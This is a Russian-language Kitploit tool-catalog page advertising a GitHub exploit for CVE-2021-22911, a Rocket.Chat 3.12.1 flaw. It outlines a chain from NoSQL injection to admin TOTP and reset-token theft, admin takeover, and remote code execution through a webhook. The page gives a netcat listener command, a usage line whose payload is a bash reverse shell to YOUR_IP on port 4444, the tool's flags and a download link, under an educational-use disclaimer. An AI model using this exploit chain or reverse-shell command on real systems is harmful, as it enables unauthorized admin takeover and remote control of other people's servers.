Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22911-RocketChat | Kitploit
Инструменты/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (импровизированный)

Описание

Эксплуатирует уязвимость NoSQL-инъекции до аутентификации в Rocket.Chat 3.12.1, чтобы раскрыть TOTP-секрет администратора и токен сброса пароля, захватить учётную запись администратора и добиться RCE через вредоносную webhook-интеграцию.

Затронутая версия

Rocket.Chat <= 3.12.1

Требования

pip install -r requirements.txt

Установка — сначала запустите слушатель

Перед запуском эксплойта запустите netcat-слушатель в отдельном терминале, чтобы поймать входящую обратную оболочку:

root@kitploit:~
nc -lvnp 4444

Держите этот терминал открытым. После успешного запуска эксплойта ваша оболочка появится здесь.

Использование

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Аргументы

Как это работает

  1. Выполняет аутентификацию как пользователь с низкими привилегиями через протокол DDP
  2. Раскрывает TOTP-секрет администратора через NoSQL-инъекцию $where
  3. Инициирует отправку письма о сбросе пароля администратора
  4. Раскрывает токен сброса пароля администратора через NoSQL-инъекцию $where
  5. Сбрасывает пароль администратора, обходя 2FA, используя раскрытый TOTP-секрет
  6. Создаёт вредоносную webhook-интеграцию и запускает RCE

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Всегда получайте надлежащее письменное разрешение перед тестированием.

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
Скачать инструмент
ФлагОписание
-tURL целевого Rocket.Chat
-uВаше зарегистрированное имя пользователя с низкими правами
-pВаш зарегистрированный пароль пользователя с низкими правами
-eАдрес электронной почты администратора
-aИмя пользователя администратора
-cКоманда обратной оболочки
-vПодробный режим (показывает необработанные ответы)